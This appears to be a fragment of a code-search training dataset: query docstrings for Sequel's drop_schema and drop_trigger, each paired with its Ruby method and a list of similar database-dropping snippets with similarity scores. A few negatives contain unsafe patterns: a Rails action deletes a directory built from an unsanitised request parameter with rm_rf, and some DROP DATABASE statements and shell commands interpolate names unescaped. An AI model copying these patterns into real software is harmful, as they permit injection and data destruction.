"def drop_rule(name, table)\n execute \"DROP RULE #{quote_rule(name)} ON #{quote_table_name(table)};\"\n end",
"def delete_game\n\t\tall_saved_games = yaml_load(SAVED_FILENAME)\n\t\tgame_name = get_game_name(all_saved_games, \"delete\")\n\t\treturn if game_name.nil?\n\n\t\tall_saved_games.delete(game_name)\n\t\tyaml_save(SAVED_FILENAME, all_saved_games)\n\t\tmessage_then_enter \"'#{ game_name }' successfully deleted.\"\n\tend",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def remove_variable(name)\n if @handle.ptr == nil\n raise \"this is disposed\"\n end\n Native.RunEditor_remove_variable(@handle.ptr, name)\n end",
"def delete_po\r\n\r\n FileUtils.rm_rf \"#{Rails.root}/po/#{params[:locale]}\"\r\n redirect_to locales_path\r\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @language = Language.find(params[:id])\n @language.destroy\n\n respond_to do |format|\n format.html { redirect_to(languages_url) }\n format.xml { head :ok }\n end\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def destroy\n @languagename.destroy\n respond_to do |format|\n format.html { redirect_to languagenames_url, notice: 'Languagename was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def uninstall_on!(db, options = {})\n sql = \"\"\n all_objects_in_order.reverse.each{|o| \n begin\n sql = o.to_clean_sql(db)\n execute_ddl(db, sql, options)\n rescue Sequel::Error => ex\n puts \"Ignoring: #{ex.message}\" if options[:verbose]\n end\n }\n db\n end",
"def remove_from(type, name)\n\n #Find if the object exists\n index = search(type, name)\n\n #Stops if exercise list is empty\n if index == -1\n return -1\n end\n\n #Removes an exercise object\n if type == \"exercise\"\n @exercise_list.delete_at(index)\n return 0\n #Removes a workout object\n elsif type == \"workout\"\n @workout_routines.delete_at(index)\n return 0\n #Error handling\n else\n return -1\n end\n end",
"def destroy\n @pug.destroy\n\n head :no_content\n end",
"def remove_stored_function(function_name)\n return false unless self[SYSTEM_JS_COLLECTION].find_one({\"_id\" => function_name})\n self[SYSTEM_JS_COLLECTION].remove({\"_id\" => function_name}, :w => 1)\n end",
"def delete(id)\n StoredProcedures.delete(as_id(id))\n end",
"def drop_collection(name)\n return false if strict? && !collection_names.include?(name.to_s)\n begin\n ok?(command(:drop => name))\n rescue OperationFailure => e\n false\n end\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def delete(name)\n File.delete(path(name))\n end",
"def destroy\n\t\t@language = Language.find(params[:id])\n\t\t@language.destroy\n\n\t\trespond_with @language do |format|\n\t\t\tformat.html { redirect_to languages_url }\n\t\t\tformat.json { head :ok }\n\t\tend\n\tend",
"def delete(name, options = T.unsafe(nil)); end",
"def remove_pet_by_name(pet_shop, pet_name)\n pet_to_delete = find_pet_by_name(pet_shop, pet_name)\n pet_shop[:pets].delete(pet_to_delete)\nend",
"def destroy_database(name)\n database = ::MySQL::Database.find_by_name(name)\n return false if database.nil?\n !!database.destroy\n end",
"def delete_translations\n end",
"def destroy\n @language_dialect.destroy\n respond_to do |format|\n format.html { redirect_to language_dialects_url, notice: 'Language dialect was successfully destroyed.' }\n format.json { head :no_content }\n end\n end"
] |
[
"0.771682",
"0.62814724",
"0.6009372",
"0.6009372",
"0.5947735",
"0.5887368",
"0.58383554",
"0.58220875",
"0.57442856",
"0.5699863",
"0.56750304",
"0.56655055",
"0.5662529",
"0.562056",
"0.5534475",
"0.551798",
"0.54874253",
"0.54649365",
"0.5445987",
"0.54157716",
"0.5367591",
"0.53582484",
"0.5357611",
"0.53406286",
"0.5299497",
"0.5294444",
"0.52835304",
"0.5273564",
"0.5259413",
"0.5259413",
"0.5245033",
"0.52366674",
"0.52238023",
"0.52198315",
"0.5192227",
"0.5164574",
"0.5162842",
"0.51559013",
"0.514678",
"0.514513",
"0.5130205",
"0.51191735",
"0.5117823",
"0.51155126",
"0.51115906",
"0.5101914",
"0.5096802",
"0.5067832",
"0.50514776",
"0.5044741",
"0.503996",
"0.50316346",
"0.50316346",
"0.5023673",
"0.49952167",
"0.49830514",
"0.49826768",
"0.49818218",
"0.4976098",
"0.49651456",
"0.4959482",
"0.49532235",
"0.49488407",
"0.4947797",
"0.49403015",
"0.49386197",
"0.49384513",
"0.4929347",
"0.4926984",
"0.49249583",
"0.49243394",
"0.4922462",
"0.49174654",
"0.4905779",
"0.49040192",
"0.49006394",
"0.48970205",
"0.48942992",
"0.48939383",
"0.4893469",
"0.48933306",
"0.48747745",
"0.48747745",
"0.48648414",
"0.4858034",
"0.48559278",
"0.48556748",
"0.48520952",
"0.4845849",
"0.48458135",
"0.48439094",
"0.4841691",
"0.48411638",
"0.48347443",
"0.4834459",
"0.48314127",
"0.48264185",
"0.48229218",
"0.48227003",
"0.48146015"
] |
0.71211535
|
1
|
Drops a schema from the database. Arguments: name :: name of the schema to drop opts :: options hash: :cascade :: Drop all objects in this schema. :if_exists :: Don't raise an error if the schema doesn't exist.
|
def drop_schema(name, opts=OPTS)
self << drop_schema_sql(name, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_schema(schema_name)\n execute(\"DROP SCHEMA \\\"#{schema_name}\\\"\")\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def delete\n ensure_service!\n service.delete_schema name\n true\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def unload_schema(schema_name)\n end",
"def drop_schema(schema)\n execute \"DROP SCHEMA #{schema} RESTRICT\", 'Drop Schema'\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def destroy_schema\n Apartment::Tenant.drop(schema_name)\n Rails.logger.info(\"Tenant dropped: #{schema_name}\")\n rescue Apartment::TenantNotFound => e\n Rails.logger.warn(\"Failed to drop tenant (not found): #{schema_name}\")\n raise e if Rails.env.production? # Don't raise an exception in dev mode so to allow seeds to work\n end",
"def drop_tablespace(name, options = {})\n sql = 'DROP TABLESPACE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_tablespace(name)\n\n execute(\"#{sql};\")\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def drop\n\t\tActiveRecord::Base.connection.execute \"SET AUTOCOMMIT=0\"\n\t\tActiveRecord::Base.connection.execute \"SET FOREIGN_KEY_CHECKS=0\"\n\n self.change_schema_to 'information_schema';\n @result[:deleted] = []\n \n if request[:remove_all]\n #remove all tables\n @tables = ActiveRecord::Base.connection.select_all \"select TABLE_NAME table_name from `TABLES` where `TABLE_SCHEMA`='#{request[:db_name]}'\"\n self.change_schema_to request[:db_name];\n \n @tables.each do |table|\n ActiveRecord::Base.connection.execute \"drop table `#{table[\"table_name\"]}`\"\n @result[:deleted].push table[\"table_name\"];\n end\n else\n self.change_schema_to request[:db_name];\n ActiveRecord::Base.connection.execute \"drop table `#{request[:key]}`\";\n @result[:deleted].push request[:key];\n end\n \n self.change_schema_to 'information_schema';\n @result[:type] = 'table'\n render json: @result\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def destroy_database(name)\n database = ::MySQL::Database.find_by_name(name)\n return false if database.nil?\n !!database.destroy\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_sequence(sequence_name, options = {})\n SchemaMonkey::Middleware::Migration::DropSequence.start(connection: self, sequence_name: sequence_name, sequence_options: options) do |env|\n sequence_name = env.sequence_name\n options = env.sequence_options\n sql = \"DROP SEQUENCE\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(sequence_name)}\"\n execute sql\n end\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema = Schema.find(params[:id])\n @schema.destroy\n\n respond_to do |format|\n format.html { redirect_to schemas_url }\n format.json { head :no_content }\n end\n end",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @schema.destroy\n respond_to do |format|\n format.html { redirect_to schemas_url, notice: 'Schema was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_db\n Mongoid.purge!\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def destroy_schema\n Apartment::Tenant.drop tenant\n end",
"def destroy\n [METADATA_TABLE_NAME, RUN_HISTORY_TABLE_NAME,\n DISABLED_MONITOR_TABLE_NAME, MONITOR_INFO_TABLE_NAME].each do |table|\n @db.execute(\"DROP TABLE IF EXISTS #{table}\")\n end\n\n create()\n end",
"def to_sql_drop_namespace(db)\n if db.supports_schemas?\n db.send(:drop_schema_sql, self.name, {})\n else\n \"\"\n end\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def destroy\n @schema_table.destroy\n respond_to do |format|\n format.html { redirect_to schema_tables_url, notice: 'Schema table was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def drop_mysql_database\n MysqlUtils.drop_mysql_database(database_name)\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def destroy\n DATABASE.destroy(self)\n end",
"def db_destroy_mysql(*args)\n\n\t\t\tcmd_db_disconnect()\n\n\t\t\treturn if ! db_find_tools(%W{mysqladmin})\n\n\t\t\tinfo = db_parse_db_uri_mysql(args[0])\n\t\t\targv = []\n\n\t\t\tif (info[:user])\n\t\t\t\targv.push('-u')\n\t\t\t\targv.push(info[:user])\n\t\t\tend\n\n\t\t\tif (info[:pass])\n\t\t\t\targv.push('--password=' + info[:pass])\n\t\t\tend\n\n\t\t\tif (info[:host])\n\t\t\t\targv.push('-h')\n\t\t\t\targv.push(info[:host])\n\t\t\tend\n\n\t\t\tif (info[:port])\n\t\t\t\targv.push('-P')\n\t\t\t\targv.push(info[:port])\n\t\t\tend\n\n\t\t\targv.push(\"-f\")\n\n\t\t\tcargs = argv.map{|c| \"'#{c}' \"}.join\n\t\t\tsystem(\"mysqladmin -f #{cargs} drop #{info[:name]}\")\n\t\tend",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete_schema request_pb, options = nil\n raise ::ArgumentError, \"request must be provided\" if request_pb.nil?\n\n verb, uri, query_string_params, body = ServiceStub.transcode_delete_schema_request request_pb\n query_string_params = if query_string_params.any?\n query_string_params.to_h { |p| p.split \"=\", 2 }\n else\n {}\n end\n\n response = @client_stub.make_http_request(\n verb,\n uri: uri,\n body: body || \"\",\n params: query_string_params,\n options: options\n )\n operation = ::Gapic::Rest::TransportOperation.new response\n result = ::Google::Longrunning::Operation.decode_json response.body, ignore_unknown_fields: true\n\n yield result, operation if block_given?\n result\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_foreign_key_constraint(table_name, options={})\n constraint_name = options[:name] || \"#{table_name}_ibfk_#{foreign_key}\"\n raise ArgumentError, \"You must specify the constraint name\" if constraint_name.blank?\n \n @connection.remove_foreign_key_constraint(table_name, constraint_name)\n end",
"def drop_audit_schema!\n @config[:drop_audit_schema] = true\n end",
"def delete(name)\n @driver.deleteRule([name])\n end",
"def drop_rule(name, table)\n execute \"DROP RULE #{quote_rule(name)} ON #{quote_table_name(table)};\"\n end",
"def clean_schema\n # AppControl.restart_server # if Rails.env.production?\n ActiveRecord::Base.connection.schema_cache.clear!\n end",
"def drop_table?(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n if supports_drop_table_if_exists?\n options = options.merge(:if_exists=>true)\n names.each do |name|\n drop_table(name, options)\n end\n else\n names.each do |name|\n drop_table(name, options) if table_exists?(name)\n end\n end\n nil\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def alter_table(name, *)\n super\n remove_cached_schema(name)\n nil\n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def remove(name)\n sudo \"rm -rf #{god_confd}/#{name}\"\n end",
"def drop_sequence(name)\n name = quote_name(name)\n sql = \"DROP SEQUENCE #{name}\"\n execute(sql)\n end",
"def migrate!\n @logger.fine('Dropping schema...')\n\n migrate(0) # migrate to version 0.\n migrate # migrate to latest version.\n end",
"def destroy\n dbf.destroy\n rescue MissingSource\n ensure\n freeze\n end",
"def drop_database\n puts \"Droping database #{@db_name}...\"\n begin\n client = Mysql2::Client.new(:host => @db_host, :username => @db_user, :password => @db_pass)\n client.query(\"DROP DATABASE IF EXISTS #{@db_name}\")\n client.close\n rescue Exception => e\n puts \"An error occurred\\n #{e}\"\n end\n end",
"def uninstall\n if installed?\n destroy_database_directory\n destroy_database_configuration_file\n end\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def destroy!\n Dropio::Resource.client.delete_drop(self)\n end",
"def drop_db( path_names )\n path_name_tokens = path_names.split( \"|\" )\n zone = path_name_tokens[1]\n connect_for( zone ) do |con|\n db_name = path_name_tokens.pop\n con.drop_database( db_name )\n end\n end",
"def drop(opts = {})\n client.send(:with_session, opts) do |session|\n maybe_drop_emm_collections(opts[:encrypted_fields], client, session) do\n temp_write_concern = write_concern\n write_concern = if opts[:write_concern]\n WriteConcern.get(opts[:write_concern])\n else\n temp_write_concern\n end\n context = Operation::Context.new(client: client, session: session)\n operation = Operation::Drop.new({\n selector: { :drop => name },\n db_name: database.name,\n write_concern: write_concern,\n session: session,\n })\n do_drop(operation, session, context)\n end\n end\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def drop_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::DropView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n options = env.options\n materialized = options[:materialized] ? 'MATERIALIZED' : ''\n sql = \"DROP #{materialized} VIEW\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def drop_sequence(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP SEQUENCE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |s| quote_sequence(s) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def delete_database(database_name)\n @glue_client.delete_database(name: database_name)\n rescue Aws::Glue::Errors::ServiceError => e\n @logger.error(\"Glue could not delete database: \\n#{e.message}\")\n end",
"def drop(path = nil, opts = {})\n array_opts = []\n array_opts << \"--all\" if opts[:all]\n array_opts << \"--force\" if opts[:force]\n\n command(\"drop #{escape(path)}\", array_opts)\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def destroy\n return if @name.nil?\n delete_rest \"rules/#{@name}\"\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def destroy_constraints_statement(table_name, constraint_name)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_constraint_name(constraint_name)}\n EOS\n end",
"def unlink\n self.transaction do\n self.class.factory.model.connection.execute <<-SQL\n ALTER TABLE #{name} NO INHERIT #{self.class.factory.model.table_name};\n ALTER TABLE #{name} RENAME TO #{name}_unlinked;\n SQL\n self.destroy\n end\n end",
"def delete_bridge_model(name, headers=default_headers)\n @logger.info(\"Deleting the \\\"#{name}\\\" Bridge Model.\")\n delete(\"#{@api_url}/models/#{encode(name)}\", headers)\n end"
] |
[
"0.8012164",
"0.78485155",
"0.78375214",
"0.7437326",
"0.7366318",
"0.72286713",
"0.7122654",
"0.702088",
"0.69215715",
"0.672576",
"0.661924",
"0.6551986",
"0.6446336",
"0.6397896",
"0.63680106",
"0.629387",
"0.62173814",
"0.6208451",
"0.6206428",
"0.6178284",
"0.6169206",
"0.6162189",
"0.6128806",
"0.61265737",
"0.60457695",
"0.5943767",
"0.5922501",
"0.5917542",
"0.59151995",
"0.5859275",
"0.5825405",
"0.5825405",
"0.5823832",
"0.57804435",
"0.57550114",
"0.57550114",
"0.5720045",
"0.5707434",
"0.5707434",
"0.5707434",
"0.5694628",
"0.56902283",
"0.56692517",
"0.56502956",
"0.5636745",
"0.5516031",
"0.5503439",
"0.5478035",
"0.5478035",
"0.5453135",
"0.5432388",
"0.54260045",
"0.5396281",
"0.5385312",
"0.5373159",
"0.53643334",
"0.5358816",
"0.535798",
"0.53510386",
"0.5334705",
"0.53318095",
"0.53317267",
"0.53290904",
"0.5319545",
"0.53189",
"0.53040576",
"0.53017074",
"0.52854973",
"0.5284623",
"0.5281995",
"0.52671367",
"0.52666616",
"0.5233103",
"0.5227858",
"0.52177256",
"0.52054954",
"0.51968676",
"0.51945907",
"0.51744175",
"0.51658094",
"0.51546764",
"0.51521915",
"0.51394325",
"0.5137744",
"0.5130169",
"0.5122741",
"0.5119782",
"0.5119782",
"0.5118755",
"0.5103465",
"0.5099686",
"0.50973284",
"0.50970066",
"0.50968754",
"0.50948685",
"0.5077714",
"0.5077516",
"0.5076545",
"0.50684243",
"0.50567955"
] |
0.7423064
|
4
|
Drops a trigger from the database. Arguments: table :: table from which to drop the trigger name :: name of the trigger to drop opts :: options hash: :cascade :: Drop other objects depending on this function. :if_exists :: Don't raise an error if the function doesn't exist.
|
def drop_trigger(table, name, opts=OPTS)
self << drop_trigger_sql(table, name, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def drop_trigger(database, table)\n trigger_name = \"#{options(table)[:rep_prefix]}_#{table}\"\n session.send(database).drop_replication_trigger trigger_name, table\n end",
"def drop_replication_trigger(trigger_name, table_name)\n %w(insert update delete).each do |action|\n execute \"DROP TRIGGER `#{trigger_name}_#{action}`;\"\n end\n execute \"DROP PROCEDURE `#{trigger_name}`;\"\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def delete_table(table)\r\n referenced_by = references(table)\r\n if !referenced_by.empty?\r\n puts \"unable to delete table \\'#{table}\\' because it is referenced by table(s):\"\r\n referenced_by.each{|table_name| puts \"#{table_name}\"}\r\n false\r\n elsif table_exists?(table)\r\n delete_table_cmd = \"DROP TABLE IF EXISTS #{table}\"\r\n @db.execute(delete_table_cmd)\r\n puts \"#{table} was deleted\"\r\n true\r\n end\r\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def remove_trigger(id)\n\t transmit(:remove_trigger, id)\n\t triggers.delete(id)\n\tend",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_table(table)\n current_instructions << Instructions::DropTable.new(table: table)\n end",
"def drop_foreign_key(table, field)\n execute \"ALTER TABLE #{table} DROP FOREIGN KEY #{constraint_name(table, field)}\"\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
